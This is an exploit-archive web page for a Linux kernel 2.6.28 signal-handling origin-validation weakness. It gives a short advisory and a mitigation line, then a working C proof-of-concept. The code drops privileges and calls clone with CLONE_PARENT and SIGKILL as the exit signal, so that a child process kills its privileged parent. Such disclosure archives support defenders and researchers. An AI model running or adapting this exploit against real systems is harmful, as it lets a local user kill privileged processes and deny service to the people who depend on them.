header-logo
Suggest Exploit
vendor:
Kernel
by:
SecurityFocus
7.2
CVSS
HIGH
Signal Handling
20
CWE
Product Name: Kernel
Affected Version From: Linux kernel 2.6.28
Affected Version To: Other versions may also be affected.
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2008

Linux Kernel Origin Validation Weakness

The Linux kernel is prone to an origin-validation weakness when dealing with signal handling. This weakness occurs when a privileged process calls attacker-supplied processes as children. Attackers may exploit this to send arbitrary signals to the privileged parent process. A local attacker may exploit this issue to kill vulnerable processes, resulting in a denial-of-service condition. In some cases, other attacks may also be possible.

Mitigation:

Ensure that all processes are properly validated before being called as children.
Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/33906/info

The Linux kernel is prone to an origin-validation weakness when dealing with signal handling.

This weakness occurs when a privileged process calls attacker-supplied processes as children. Attackers may exploit this to send arbitrary signals to the privileged parent process.

A local attacker may exploit this issue to kill vulnerable processes, resulting in a denial-of-service condition. In some cases, other attacks may also be possible.

Linux kernel 2.6.28 is vulnerable; other versions may also be affected. 
*/

#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>

static int the_child(void* arg) {
  sleep(1);
  _exit(2);
}

int main(int argc, const char* argv[]) {
  int ret = fork();
  if (ret < 0)
  {
    perror("fork");
    _exit(1);
  }
  else if (ret > 0)
  {
    for (;;);
  }
  setgid(99);
  setuid(65534);
  {
    int status;
    char* stack = malloc(4096);
    int flags = SIGKILL | CLONE_PARENT;
    int child = clone(the_child, stack + 4096, flags, NULL);
  }
  _exit(100);
}

Navigation

Suggest Exploit

Services By CQR